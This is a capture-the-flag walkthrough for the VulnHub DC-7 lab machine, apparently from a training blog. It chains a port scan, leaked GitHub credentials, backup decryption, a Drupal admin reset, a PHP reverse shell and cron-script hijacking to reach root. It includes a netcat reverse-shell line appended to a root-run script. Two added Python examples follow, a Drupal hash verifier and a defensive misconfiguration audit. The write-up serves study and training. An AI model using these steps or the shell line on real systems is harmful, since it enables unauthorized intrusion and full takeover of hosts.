CTF Walk Through | HackProof Academy

23/12/2024 Shad Hussain
CTF Walk Through - DC7 - VulnHub

Machine link: https://www.vulnhub.com/entry/dc-7,356/

STEP1 - port scan

    nmap 192.168.31.253 -p- -Pn -A -T4 -sSV

FINDING
    22/tcp open ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
    80/tcp open http    Apache httpd 2.4.25 ((Debian))
    |_http-title: Welcome to DC-7 | D7
    | http-robots.txt: 22 disallowed entries (15 shown)
    | /core/ /profiles/ /README.txt /web.config /admin/
    | /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
    | /user/password/ /user/login/ /user/logout/ /index.php/admin/
    |_/index.php/comment/reply/

---------------------------------------------------------------------

STEP2 - the web site and some OSINT

    http://192.168.31.253/

HINT on the site: What you will have to do, is to think "outside" the box.
The site is signed @DC7USER. Googling @DC7USER leads to:

    https://github.com/Dc7User
    https://github.com/Dc7User/staffdb
    https://github.com/Dc7User/staffdb/blob/master/config.php

FINDING (config.php, with credentials committed to the public repo)

    <?php
    $servername = "localhost";
    $username = "dc7user";
    $password = "MdR3xOgB7#dW";
    $dbname = "Staff";
    $conn = mysqli_connect($servername, $username, $password, $dbname);
    ?>

---------------------------------------------------------------------

STEP3 - SSH in with the leaked credentials

    ssh [email protected]
    pwd : MdR3xOgB7#dW

---------------------------------------------------------------------

STEP4 - look around the home directory

    cd /home/dc7user/backups
    ls

FINDING
    website.sql.gpg  website.tar.gz.gpg

---------------------------------------------------------------------

STEP5 - the backup script

    cd /opt/scripts
    ls -la backups.sh
    cat backups.sh

FINDING
    #!/bin/bash
    rm /home/dc7user/backups/*
    cd /var/www/html/
    drush sql-dump --result-file=/home/dc7user/backups/website.sql
    cd ..
    tar -czf /home/dc7user/backups/website.tar.gz html/
    gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
    gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz

---------------------------------------------------------------------

STEP6 - decrypt the backup with the passphrase from the script

    cd /home/dc7user/backups
    gpg --decrypt website.sql.gpg > /tmp/website.sql
    (PickYourOwnPassword is the passphrase)
    ls -la
    website.sql  website.sql.gpg  website.tar.gz.gpg
    head -n 50 website.sql
    grep "Table structure for table" website.sql

FINDING
    -- Table structure for table `config`
    -- Table structure for table `url_alias`
    -- Table structure for table `users`
    -- Table structure for table `users_data`
    -- Table structure for table `users_field_data`

---------------------------------------------------------------------

STEP7 - pull the password hashes out of the dump

    grep -A 30 "Table structure for table users" website.sql
    grep -A 40 'Table structure for table `users_field_data`' website.sql

Open website.sql in Mousepad and go to line 2213.

FINDING
    INSERT INTO `users_field_data` VALUES ...
    admin    $S$Ead.KmIcT/yfKC.1H53aDPJasaD7o.ioEGiaPy1lLyXXAJC/Qi4F
    dc7user  $S$EKe0kuKQvFhgFnEYMpq.mRtbl/TQ5FmEjCDxbu0HIHaO0/U.YFjI

The $S$ prefix is the Drupal hash format; see https://hashcat.net/wiki/doku.php?id=example_hashes
(mode 7900, Drupal7, example hash $S$C33783772bRXEx1aCsvY.dqgaaSu76XmVlKrW9Qu8IQlvxHlmzLf).
Nothing works here: cracking these hashes got nowhere.

---------------------------------------------------------------------

STEP8 - reset the admin password with drush instead

A quick search shows that drush can change a user's password:

    cd /var/www/html
    drush user-password admin --password=password123
    Changed password for admin                                  [success]

---------------------------------------------------------------------

STEP9 - log in to Drupal

Log in at http://192.168.0.109/user/login as admin / password123, then go to

    http://192.168.31.154/admin/modules/install

---------------------------------------------------------------------

STEP10 - install the PHP module and get a shell

Go to https://www.drupal.org/project/php/releases/8.x-1.0 and download the PHP
module tar.gz. Install it from the module install screen; on the update screen
select "Enable newly added modules" and enable it with the button at the bottom.
Then:

    http://192.168.31.154/admin/content
    http://192.168.31.154/node/add
    http://192.168.31.154/node/add/page

Title the page "rshell", paste the whole PHP reverse shell code into the body,
and set the Text format to "PHP code". Open an nc listener in a new terminal,
click PREVIEW on the Drupal page, and the reverse shell connects back.

---------------------------------------------------------------------

STEP11 - enumerate scheduled jobs as www-data

    python -c 'import pty; pty.spawn("/bin/bash")'
    cd /tmp
    (download pspy64 with wget from https://github.com/DominicBreuker/pspy/releases)
    chmod +x pspy64
    ./pspy64

Monitor what runs on a schedule: the same script runs every time.

FINDING
    /opt/scripts/backups.sh

    whoami
    www-data
    cd /opt/scripts
    ls
    backups.sh
    ls -la backups.sh
    -rwxrwxr-x 1 root www-data 555 Dec 18 03:04 backups.sh

The script is owned by root but group-writable by www-data, so we can write to
it and take a new reverse shell on another terminal.

---------------------------------------------------------------------

STEP12 - append a reverse shell to the root-run script

    echo "nc 192.168.0.102 4444 -e /bin/sh" >> backups.sh

Open nc -nvlp 4444 in a new terminal and wait; when backups.sh runs on schedule
you get a reverse root shell.

---------------------------------------------------------------------

STEP13 - the flag

On the new root terminal:

    whoami
    root
    cd root
    cat theflag.txt

FINDING
    (ASCII-art banner)

    Congratulations!!!

    Hope you enjoyed DC-7. Just wanted to send a big thanks out there to all
    those who have provided feedback, and all those who have taken the time to
    complete these little challenges.

    I'm sending out an especially big thanks to:

    @4nqr34z
    @D4mianWayne
    @0xmzfr
    @theart42

    If you enjoyed this CTF, send me a tweet via @DCAU7.

---------------------------------------------------------------------
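Why the STEP7 hashes did not crack: the $S$ format is Drupal's phpass-style SHA-512 hash, and the fourth character sets the cost. This added example (not from the write-up) parses that setting string and recomputes a hash with the same construction; hashcat's published mode-7900 example hash (password "hashcat") is used as the known-answer check, and the page's own $S$E hashes show a cost of 2^16 rounds per guess.

```python
"""Added example, not from the write-up: Drupal's $S$ (phpass-style SHA-512)
password hash, with the cost parameter read from the setting string."""
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55  # Drupal keeps only the first 55 characters of the output


def parse_setting(stored: str) -> dict:
    """Split '$S$' + cost character + 8-character salt out of a stored hash."""
    if len(stored) < 12 or stored[:3] != "$S$":
        raise ValueError("not a Drupal $S$ hash")
    count_log2 = ITOA64.index(stored[3])  # 'C' -> 14, 'E' -> 16 (Drupal 8 default)
    return {"count_log2": count_log2, "iterations": 1 << count_log2,
            "salt": stored[4:12]}


def _phpass_b64(data: bytes) -> str:
    """Drupal/phpass base64: 3-byte little-endian groups, 6 bits per symbol."""
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        value = int.from_bytes(chunk, "little")
        for k in range(len(chunk) + 1):  # 1 byte -> 2 chars, 2 -> 3, 3 -> 4
            out.append(ITOA64[(value >> (6 * k)) & 0x3F])
    return "".join(out)


def drupal_hash(password: str, setting: str) -> str:
    """Recompute the stored form of password under setting's salt and cost."""
    s = parse_setting(setting)
    pw = password.encode()
    digest = hashlib.sha512(s["salt"].encode() + pw).digest()
    for _ in range(s["iterations"]):  # the cost: 2**count_log2 extra rounds
        digest = hashlib.sha512(digest + pw).digest()
    return (setting[:12] + _phpass_b64(digest))[:HASH_LENGTH]


def verify(password: str, stored: str) -> bool:
    """Constant-time comparison of the recomputed hash with the stored one."""
    return hmac.compare_digest(drupal_hash(password, stored), stored)


if __name__ == "__main__":
    # hashcat's published mode-7900 example hash; its password is "hashcat"
    example = "$S$C33783772bRXEx1aCsvY.dqgaaSu76XmVlKrW9Qu8IQlvxHlmzLf"
    print(parse_setting(example), verify("hashcat", example))
    # one of the hashes dumped from DC-7's users_field_data table: cost 'E'
    print(parse_setting("$S$EKe0kuKQvFhgFnEYMpq.mRtbl/TQ5FmEjCDxbu0HIHaO0/U.YFjI"))
```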
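The root shell came from two misconfigurations: a script run by root on a schedule that www-data could write to (STEP11/12) and a gpg passphrase passed on the command line (STEP5). This added audit (not from the write-up) checks scripts for both; it runs against a constructed scratch directory holding a copy of the weak backups.sh and a hypothetical hardened backups_fixed.sh that keeps the passphrase in a root-only file.

```python
"""Added example, not from the write-up: audit scripts that a root cron job runs
for the two weaknesses behind the DC-7 root shell, a script writable by a group
or by everyone (backups.sh was root:www-data, mode 775) and a gpg passphrase
given on the command line. Runs against a constructed scratch directory."""
import os
import re
import stat
import tempfile

# '--passphrase <value>' or '--passphrase=<value>'; '--passphrase-file' is not matched
PASSPHRASE_RE = re.compile(r"--passphrase(?:\s+|=)\S+")


def audit_script(path: str) -> list[str]:
    """Return one finding per weakness in the script at path (empty if clean)."""
    findings = []
    mode = os.stat(path).st_mode
    if mode & (stat.S_IWGRP | stat.S_IWOTH):  # anyone but the owner can edit it
        findings.append(f"WRITABLE_BY_NON_OWNER {path} mode={stat.filemode(mode)}")
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            if PASSPHRASE_RE.search(line):
                findings.append(f"HARDCODED_PASSPHRASE {path}:{lineno}")
    return findings


def audit_directory(directory: str) -> list[str]:
    """Audit every regular file in directory, in name order."""
    findings = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            findings.extend(audit_script(path))
    return findings


def build_demo_dir() -> str:
    """Constructed copy of the weak backups.sh plus a hypothetical hardened one."""
    d = tempfile.mkdtemp()
    weak = os.path.join(d, "backups.sh")
    with open(weak, "w") as fh:
        fh.write("#!/bin/bash\ngpg --pinentry-mode loopback --passphrase "
                 "PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql\n")
    os.chmod(weak, 0o775)  # rwxrwxr-x, as found in /opt/scripts on DC-7
    fixed = os.path.join(d, "backups_fixed.sh")
    with open(fixed, "w") as fh:
        fh.write("#!/bin/bash\ngpg --batch --passphrase-file /root/.backup-key "
                 "--symmetric /home/dc7user/backups/website.sql\n")
    os.chmod(fixed, 0o700)  # owner-only; /root/.backup-key is a hypothetical path
    return d


if __name__ == "__main__":
    for finding in audit_directory(build_demo_dir()):
        print(finding)
```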

© mutebreak.com | All Rights Reserved